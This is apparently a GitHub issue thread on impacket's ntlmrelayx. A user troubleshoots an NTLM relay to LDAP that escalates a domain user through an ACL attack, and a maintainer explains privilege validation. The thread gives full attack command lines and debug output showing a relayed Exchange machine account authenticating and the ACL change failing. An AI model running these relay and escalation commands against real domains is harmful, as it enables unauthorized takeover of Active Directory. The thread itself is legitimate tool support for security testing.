Closed Andrew143413 closed 3 years ago
Attacks to LDAP automatically validate which privileges the relayed user has. It only mentions "create user" privileges, not "modify domain ACL" privileges. So likely your Exchange permissions are not vulnerable. You can also skip the permission detection and always try the ACL attack with --no-validate-privs
, if that fails with access denied then you know for sure you don't have the required permissions.
Thanks for the reply @dirkjanm and thank you for your great work! I was inspired by your blog posts to look more deeply into the security challenges with Active Directory.
I've also tried to run ntlmrelayx as follows:
ntlmrelayx.py -t ldap://dc01.tdomain.xy --no-smb-server --no-dump --no-da --no-acl --escalate-user u.regular
ntlmrelayx.py -t ldap://dc01.tdomain.xy --no-smb-server --no-dump --no-da --no-acl --no-validate-privs --escalate-user u.regular
but got the same result - ntlmrelayx stucks without any error message. I don't have the output of those commands right now, but I'll recheck to ensure that I didn't miss anything.
As regard to "modify domain ACL" privilege is there a way to check manually if a machine or any user has it or not? I have domain admin privileges in dc01.tdomain.xy domain.
Thanks.
The problem was indeed caused by a lack of access rights:
ntlmrelayx.py -t ldap://dc01.tdomain.xy --no-smb-server --no-dump --no-validate-privs --escalate-user u.regular -debug
Impacket v0.9.22.dev1+20200924.183326.65cf657f - Copyright 2020 SecureAuth Corporation
[+] Impacket Library Installation Path: /usr/local/lib/python2.7/dist-packages/impacket
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMTP loaded..
[+] Protocol Attack DCSYNC loaded..
[+] Protocol Attack RPC loaded..
[+] Protocol Attack SMB loaded..
[+] Protocol Attack IMAP loaded..
[+] Protocol Attack IMAPS loaded..
[+] Protocol Attack HTTP loaded..
[+] Protocol Attack HTTPS loaded..
[+] Protocol Attack LDAP loaded..
[+] Protocol Attack LDAPS loaded..
[+] Protocol Attack MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up HTTP Server
[*] Servers started, waiting for connections
[*] HTTPD: Received connection from 10.1.0.55, attacking target ldap://dc01.tdomain.xy
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] Authenticating against dap://dc01.tdomain.xy as TDOMAIN.XY\EXCHANGE-2016-01$ SUCCEED
[*] Assuming relayed user has privileges to escalate a user via ACL attack
[+] Performing ACL attack
[+] Found sid for user U.Regular: S-1-5-21-1234567890-1234567890-1234567890-123456
[*] Querying domain security descriptor
[-] Error when updating ACL: {'dn': u'', 'referrals': None, 'description': 'insufficientAccessRights', 'result': 50, 'message': u'00000005: SecErr: DSID-03152612, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0\n\x00', 'type': 'modifyResponse'}
Thanks to everyone who made such a great library for us!
Configuration
impacket version: Impacket v0.9.22.dev1+20200924.183326.65cf657f Python version: Python 2.7.18 Python version: Python 3.8.5 Target OS: Linux rt 5.7.0-kali1-amd64 #1 SMP Debian 5.7.6-1kali2 (2020-07-01) x86_64 GNU/Linux
Hello. I have the following configuration:
ntlmrelayx seems to work (ldapdomaindump sucessfully creates .json, .grep and .html files) in the beginning, but it is getting stuck after the message "[] Domain info dumped into lootdir!" whatever I tried ;(
Debug Output With Command String -- Python 2.7.18
root@rt:~# ntlmrelayx.py -smb2support -t ldap://dc01.tdomain.xy --escalate-user u.regular -debug -l /tmp/relax
The same thing happens with Python3:
Debug Output With Command String -- Python 3.8.5
root@rt:~# ntlmrelayx.py -smb2support -t ldap://dc01.tdomain.xy --escalate-user u.regular -debug -l /tmp/relax
pip2 list
pip3 list
I'd appreciate any help to point me in the right direction. Thanks in advance.